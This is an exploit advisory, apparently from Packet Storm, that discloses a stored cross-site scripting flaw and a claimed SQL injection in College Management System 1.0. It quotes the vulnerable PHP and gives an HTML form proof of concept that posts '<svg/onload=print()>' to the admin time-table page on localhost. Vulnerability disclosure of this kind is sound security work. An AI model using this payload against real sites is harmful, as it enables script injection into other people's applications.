College Management System 1.0 Cross Site Scripting

College Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

MD5 | fbedbfd2771cf6a28832ff287eefc9b4

Download

# Exploit Title: college management system - Stored Cross-Site Scripting (XSS) Unauthenticated
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://www.eedunext.com/
# Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Kali Linux


in admin/time-table.php  in line 1 :


<?php
session_start();
if (!$_SESSION["LoginAdmin"])
{
header('location:../login/login.php');
}
require_once "../connection/connection.php";
?>


in admin/time-table.php  in line 17 - 27 :

$course_code=$_POST["course_code"];

  $semester=$_POST["semester"];

  $timing_from=$_POST["timing_from"];

  $timing_to=$_POST["timing_to"];

  $day=$_POST["day"];

  $subject_code=$_POST["subject_code"];

  $room_no=$_POST["room_no"];


is vulnerable to XSS and SqlInjection


--
Table structure for table `time_table`
--

CREATE TABLE `time_table` (
  `id` int(11) NOT NULL,
  `course_code` varchar(10) NOT NULL,
  `semester` int(11) NOT NULL,
  `timing_from` varchar(10) NOT NULL,
  `timing_to` varchar(10) NOT NULL,
  `day` varchar(20) NOT NULL,
  `subject_code` varchar(20) NOT NULL,
  `room_no` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;



20 char



POC :

<html lang="en">
<head>
<title>XSS</title>
</head>
<body class="login-background">
<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">

    <!-- css style goes here -->
     <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">


    <!-- css style go to end here -->
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
  </head>
  <body>



<div class="modal-dialog modal-lg">
<div class="modal-content">
<div class="modal-header bg-info text-white">
<h4 class="modal-title text-center">Add Time Table</h4>
</div>
<div class="modal-body">
<form action="http://127.0.0.1/2/College-Management-System/Admin/time-table.php" method="post">
<div class="form-group">
<div class="formp">
<label for="exampleInputPassword1">day No:</label>
<input type="text" name="day" class="form-control" value="5">
</div>
</div>
</div>
<div class="form-group">
<div class="formp">
<label for="exampleInputPassword1">subject_code No:</label>
<input type="text" name="subject_code" class="form-control" value="<svg/onload=print()>">
</div>
</div>
<div class="modal-footer">
<input type="submit" class="btn btn-primary" name="btn_save" value="Save Data">
<button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
</div>
</form>
</div>
</div>

Source: packetstormsecurity.com